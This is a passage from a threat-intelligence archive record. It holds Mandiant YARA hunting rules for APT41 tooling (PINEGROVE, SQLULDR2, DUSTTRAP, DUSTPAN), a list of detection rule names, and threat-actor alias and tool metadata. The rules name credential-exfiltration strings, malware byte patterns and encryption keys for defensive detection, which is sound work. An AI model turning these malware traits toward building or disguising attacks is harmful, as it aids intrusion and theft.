\"main.ConfigInit\" ascii\r\n        $f4 = \"main.ConfigRead\" ascii\r\n        $f5 = \"main.ConfigSave\" ascii\r\n        $f6 = \"main.ConfigUpdate\" ascii\r\n        $f7 = \"main.Exit\" ascii\r\n        $f8 = \"main.FileRange\" ascii\r\n        $f9 = \"main.FileReader\" ascii\r\n        $f10 = \"main.FileStatus\" ascii\r\n        $f11 = \"main.FormatRemoteFilePath\" ascii\r\n        $f12 = \"main.GetFileName\" ascii\r\n        $f13 = \"main.GetReomtePath\" ascii\r\n        $f14 = \"main.Header\" ascii\r\n        $f15 = \"main.init.0\" ascii\r\n        $f16 = \"main.InitFile\" ascii\r\n        $f17 = \"main.IsFolder\" ascii\r\n        $f18 = \"main.main\" ascii\r\n        $f19 = \"main.PreLoad\" ascii\r\n        $f20 = \"main.Range2Int\" ascii\r\n        $f21 = \"main.RemainTime\" ascii\r\n        $f22 = \"main.SessionCreate\" ascii\r\n        $f23 = \"main.ShowBar\" ascii\r\n        $f24 = \"main.StringChecker\" ascii\r\n        $f25 = \"main.Task\" ascii\r\n        $f26 = \"main.TaskFail\" ascii\r\n        $f27 = \"main.ThreadUpload\" ascii\r\n        $f28 = \"main.Timer\" ascii\r\n        $f29 = \"main.TimeUnix\" ascii\r\n        $f30 = \"main.Upload\" ascii\r\n        $f31 = \"main.Upload.func1\" ascii\r\n        $f32 = \"main.Uploading\" ascii\r\n        $version = \"go1.13.1\"\r\n    condition:\r\n        (\r\n            ((uint32(0) == 0xcafebabe) or (uint32(0) == 0xfeedface) or (uint32(0) == 0xfeedfacf) or (uint32(0) == 0xbebafeca) or (uint32(0) == 0xcefaedfe) or (uint32(0) == 0xcffaedfe)) or\r\n            (uint32(0) == 0x464c457f) or\r\n            (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550)\r\n        ) and\r\n        $version and (25 of ($f*))\r\n}\r\nrule M_Hunting_Uploader_PINEGROVE_3\r\n{\r\n    meta:\r\n        author = \"Mandiant\"\r\n        description = \"Hunting for PINEGROVE uploader malware family.\"\r\n        disclaimer = \"This rule is meant for hunting and is not tested to run in a production environment.\"\r\n    strings:\r\n        $s1 = \"RefreshToken\"\r\n        $s2 = \"RefreshInterval\"\r\n        $s3 = \"ThreadNum\"\r\n        $s4 = \"BlockSize\"\r\n        $s5 = \"SigleFile\"\r\n        $s6 = \"MainLand\"\r\n        $s7 = \"MSAccount\"\r\n        $anchor1 = \"driveItemUploadableProperties\"\r\n        $anchor2 = \"client_id\"\r\n        $anchor3 = \"client_secret\"\r\n        $anchor4 = \"onedrive-login\"\r\n        $anchor5 = \"authorization_code\"\r\n    condition:\r\n        (\r\n            ((uint32(0) == 0xcafebabe) or (uint32(0) == 0xfeedface) or (uint32(0) == 0xfeedfacf) or (uint32(0) == 0xbebafeca) or (uint32(0) == 0xcefaedfe) or (uint32(0) == 0xcffaedfe)) or\r\n            (uint32(0) == 0x464c457f) or\r\n            (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550)\r\n        ) and\r\n        (5 of ($s*)) and\r\n        (4 of ($anchor*))\r\n}\r\nimport \"elf\"\r\nrule M_Hunting_Utility_Linux_SQLULDR2_1\r\n{\r\n    meta:\r\n        author = \"Mandiant\"\r\n        description = \"Detection of the Linux version of SQLULDR2.\"\r\n        disclaimer = \"This rule is meant for hunting and is not tested to run in a production environment.\"\r\n    strings:\r\n        $name = \"sqluldr2zip.c\" ascii\r\n        $out = \"uldrdata.%p.txt\" ascii\r\n        $heading = \"SQL*UnLoader: Fast Oracle Text Unloader\" ascii\r\n        $p1 = \"exec = the command to execute the SQLs\" ascii\r\n        $p2 = \"file = output file name(default: uldrdata.txt)\" ascii\r\n        $p3 = \"format = MYSQL: MySQL Insert SQLs, SQL: Insert SQLs\" ascii\r\n        $p4 = \"text = output type (MYSQL, CSV, MYSQLINS, ORACLEINS, FORM, SEARCH)\" ascii\r\n        $p5 = \"rows = print progress for every given rows (default, 1000000)\" ascii\r\n        $p6 = \"query = select statement\" ascii\r\n        $p7 = \"user = username/password@tnsname\" ascii\r\n    condition:\r\n        (uint32(0) == 0x464c457f) and\r\n        $name and $out and $heading and (5 of ($p*)) and\r\n        for any i in (0 .. elf.symtab_entries): (elf.symtab[i].name == \"OCIServerAttach\") and\r\n        for any i in (0 .. elf.symtab_entries): (elf.symtab[i].name == \"OCISessionBegin\")\r\n}\r\nimport \"pe\"\r\nimport \"elf\"\r\nrule M_Hunting_Utility_SQLULDR2_1\r\n{\r\n    meta:\r\n        author = \"Mandiant\"\r\n        description = \"Detection of SQLULDR2.\"\r\n        disclaimer = \"This rule is meant for hunting and is not tested to run in a production environment.\"\r\n    strings:\r\n        $win_name = \"sqluldr2.exe\" ascii\r\n        $elf_name = \"sqluldr2zip.c\" ascii\r\n        $out = \"uldrdata.%p.txt\" ascii\r\n        $heading = \"SQL*UnLoader: Fast Oracle Text Unloader\" ascii\r\n        $p1 = \"exec = the command to execute the SQLs\" ascii\r\n        $p2 = \"file = output file name(default: uldrdata.txt)\" ascii\r\n        $p3 = \"format = MYSQL: MySQL Insert SQLs, SQL: Insert SQLs\" ascii\r\n        $p4 = \"text = output type (MYSQL, CSV, MYSQLINS, ORACLEINS, FORM, SEARCH)\" ascii\r\n        $p5 = \"rows = print progress for every given rows (default, 1000000)\" ascii\r\n        $p6 = \"query = select statement\" ascii\r\n        $p7 = \"user = username/password@tnsname\" ascii\r\n        $import = \"OCI.dll\" ascii\r\n    condition:\r\n        (((uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and\r\n          pe.imports(\"OCI.dll\",\"OCIServerAttach\") and\r\n          pe.imports(\"OCI.dll\",\"OCISessionBegin\") and\r\n          $import and $win_name and\r\n          for all of ($p*) : ( @ \u003e @heading )) or\r\n         ((uint32(0) == 0x464c457f) and\r\n          $elf_name and\r\n          for any i in (0 .. elf.symtab_entries): (elf.symtab[i].name == \"OCIServerAttach\") and\r\n          for any i in (0 .. elf.symtab_entries): (elf.symtab[i].name == \"OCISessionBegin\"))) and\r\n        $out and $heading and (5 of ($p*))\r\n}\r\nrule M_Hunting_Dropper_DUSTTRAP_1\r\n{\r\n    meta:\r\n        author = \"Mandiant\"\r\n        description = \"Detects the DUSTTRAP dropper (x64) based on the use of CFG patching constants and argument construction for payload entry-point\"\r\n        disclaimer = \"This rule is meant for hunting and is not tested to run in a production environment.\"\r\n    strings:\r\n        $cfg_patch_constant_1 = { 48 FF E0 CC 90 }\r\n        $cfg_patch_constant_2 = { 8B DA 48 8B F9 E8 }\r\n        $cfg_patch_constant_3 = { B8 48 8B 00 00 66 39 02 }\r\n        $cfg_patch_constant_4 = { 81 7A 07 48 8B D1 48 }\r\n        $log_format = \"%lld.log\" wide\r\n    condition:\r\n        uint16(0) == 0x5a4d and\r\n        all of ($cfg_patch_constant_*) and\r\n        $log_format\r\n}\r\nimport \"pe\"\r\nrule M_Hunting_DUSTPAN_CryptKeys\r\n{\r\n    meta:\r\n        author = \"Mandiant\"\r\n        description = \"Attempts to detect executables containing known DUSTPAN encryption keys within the .data section\"\r\n        disclaimer = \"This rule is meant for hunting and is not tested to run in a production environment.\"\r\n    strings:\r\n        $key_1 = { 3BCF741BF6411C087415BA340000004C8D05F28C0000488B4910E801F0FEFFB8 }\r\n        $key_2 = { C4498BD6488BCFE848A5000084C07564488BCFE8585C0000498B0F4C8B497045 }\r\n        $key_3 = { A24299055F1F0C14CBDD0B01DFA64C34F5FD033CA7F1AF30A0C75C57359D41E0 }\r\n    condition:\r\n        filesize \u003c 15MB and\r\n        for any i in (0..pe.number_of_sections - 1): (\r\n            pe.sections[i].name == \".data\" and\r\n            any of ($key_*) in (pe.sections[i].raw_data_offset..pe.sections[i].raw_data_offset + pe.sections[i].raw_data_size)\r\n        )\r\n}\r\nimport \"pe\"\r\nrule M_HUNTING_DUSTTRAP_PayloadFile\r\n{\r\n    meta:\r\n        author = \"Mandiant\"\r\n        description = \"Detects executables containing a .lrsrc section which may represent DUSTTRAP payloads\"\r\n        disclaimer = \"This rule is meant for hunting and is not tested to run in a production environment.\"\r\n    condition:\r\n        for any i in (0..pe.number_of_sections - 1): (\r\n            uint32(pe.sections[i].raw_data_offset + 0) == 0x100 and\r\n            pe.sections[i].raw_data_size \u003e uint32(pe.sections[i].raw_data_offset + 0) and\r\n            pe.sections[i].name == \".lrsrc\" and\r\n            uint32(pe.sections[i].raw_data_offset + 4) \u003c 0x1000 and\r\n            uint32(pe.sections[i].raw_data_offset + 8) \u003c 4\r\n        )\r\n}\r\nYARA-L\r\nIf you are a Google SecOps Enterprise+ customer, rules were released to your Emerging Threats rule pack, and the IOCs listed in this blog post are available for prioritization with Applied Threat Intelligence.\r\nRelevant Rules\r\nWinRAR Command Line CSV to RAR\r\nSQLULDR2 Process Launch\r\nDUSTTRAP Process Execution and Command and Control\r\nDUSTTRAP Dropping Multiple Utilities\r\nDUSTTRAP Spawning Actions on Objectives Processes\r\nSuspected DUSTTRAP Command and Control via Google API\r\nSuspected Stolen Code Signing Certificate (CCR Inc)\r\nPosted in\r\nThreat Intelligence\r\nSource: https://cloud.google.com/blog/topics/threat-intelligence/apt41-arisen-from-dust",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MITRE",
		"ETDA"
	],
	"references": [
		"https://cloud.google.com/blog/topics/threat-intelligence/apt41-arisen-from-dust"
	],
	"report_names": [
		"apt41-arisen-from-dust"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "4d5f939b-aea9-4a0e-8bff-003079a261ea",
			"created_at": "2023-01-06T13:46:39.04841Z",
			"updated_at": "2026-04-10T02:00:03.196806Z",
			"deleted_at": null,
			"main_name": "APT41",
			"aliases": [
				"WICKED PANDA",
				"BRONZE EXPORT",
				"Brass Typhoon",
				"TG-2633",
				"Leopard Typhoon",
				"G0096",
				"Grayfly",
				"BARIUM",
				"BRONZE ATLAS",
				"Red Kelpie",
				"G0044",
				"Earth Baku",
				"TA415",
				"WICKED SPIDER",
				"HOODOO",
				"Winnti",
				"Double Dragon"
			],
			"source_name": "MISPGALAXY:APT41",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e698860d-57e8-4780-b7c3-41e5a8314ec0",
			"created_at": "2022-10-25T15:50:23.287929Z",
			"updated_at": "2026-04-10T02:00:05.329769Z",
			"deleted_at": null,
			"main_name": "APT41",
			"aliases": [
				"APT41",
				"Wicked Panda",
				"Brass Typhoon",
				"BARIUM"
			],
			"source_name": "MITRE:APT41",
			"tools": [
				"ASPXSpy",
				"BITSAdmin",
				"PlugX",
				"Impacket",
				"gh0st RAT",
				"netstat",
				"PowerSploit",
				"ZxShell",
				"KEYPLUG",
				"LightSpy",
				"ipconfig",
				"sqlmap",
				"China Chopper",
				"ShadowPad",
				"MESSAGETAP",
				"Mimikatz",
				"certutil",
				"njRAT",
				"Cobalt Strike",
				"pwdump",
				"BLACKCOFFEE",
				"MOPSLED",
				"ROCKBOOT",
				"dsquery",
				"Winnti for Linux",
				"DUSTTRAP",
				"Derusbi",
				"ftp"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "2a24d664-6a72-4b4c-9f54-1553b64c453c",
			"created_at": "2025-08-07T02:03:24.553048Z",
			"updated_at": "2026-04-10T02:00:03.787296Z",
			"deleted_at": null,
			"main_name": "BRONZE ATLAS",
			"aliases": [
				"APT41",
				"BARIUM",
				"Blackfly",
				"Brass Typhoon",
				"CTG-2633",
				"Earth Baku",
				"GREF",
				"Group 72",
				"Red Kelpie",
				"TA415",
				"TG-2633",
				"Wicked Panda",
				"Winnti"
			],
			"source_name": "Secureworks:BRONZE ATLAS",
			"tools": [
				"Acehash",
				"CCleaner v5.33 backdoor",
				"ChinaChopper",
				"Cobalt Strike",
				"DUSTPAN",
				"Dicey MSDN",
				"Dodgebox",
				"ForkPlayground",
				"HUC Proxy Malware (Htran)"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434714,
	"ts_updated_at": 1775791941,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/0c90777c8e5814d8e624e737c865f4dd4e45372d.pdf",
		"text": "https://archive.orkl.eu/0c90777c8e5814d8e624e737c865f4dd4e45372d.txt",
		"img": "https://archive.orkl.eu/0c90777c8e5814d8e624e737c865f4dd4e45372d.jpg"
	}
}